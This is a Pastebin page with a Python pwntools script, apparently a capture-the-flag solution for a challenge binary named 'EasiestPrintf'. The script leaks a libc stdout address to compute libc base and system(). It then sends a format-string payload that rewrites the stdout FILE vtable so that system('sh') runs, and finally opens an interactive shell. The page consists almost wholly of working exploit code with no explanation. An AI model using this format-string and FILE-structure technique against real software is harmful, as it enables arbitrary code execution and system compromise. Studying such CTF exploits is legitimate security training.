G2A Many GEOs
SHARE
TWEET

EasiestPrintf

phieulang1993 Aug 13th, 2017 141 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2. context(arch = 'i386', os = 'linux')
  3.  
  4. libc = ELF('libc.so.6')
  5. BINARY = "EasiestPrintf"
  6. r = process(BINARY)
  7. print "attach %d" % r.pid
  8.  
  9. STDOUT = 0x0804A044
  10.  
  11. def hackIt():
  12.     r.recvuntil("Which address you wanna read:\n")
  13.     r.sendline(str(STDOUT))
  14.     _IO_2_1_stdout_ = int(r.recv(10),16)
  15.     _IO_file_jumps = _IO_2_1_stdout_ + 0x94
  16.     libc_base = _IO_2_1_stdout_ - libc.symbols['_IO_2_1_stdout_']
  17.     system = libc_base + libc.symbols['system']
  18.     log.info('_IO_2_1_stdout_: %#x' % _IO_2_1_stdout_)
  19.     log.info('_IO_file_jumps: %#x' % _IO_file_jumps)
  20.     log.info('libc_base: %#x' % libc_base)
  21.     log.info('system: %#x' % system)
  22.     r.recvuntil("Good Bye\n")
  23.     offset_buf = 7
  24.     new_IO_file_jumps = _IO_2_1_stdout_+0x150
  25.    
  26.     payload = fmtstr_payload(offset_buf, {_IO_file_jumps : new_IO_file_jumps, new_IO_file_jumps+0x1c : system, _IO_2_1_stdout_:u32("sh\x00\x00")}, write_size="short")
  27.     raw_input("debug?")
  28.     r.sendline(payload)
  29.     r.interactive()
  30. hackIt()
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top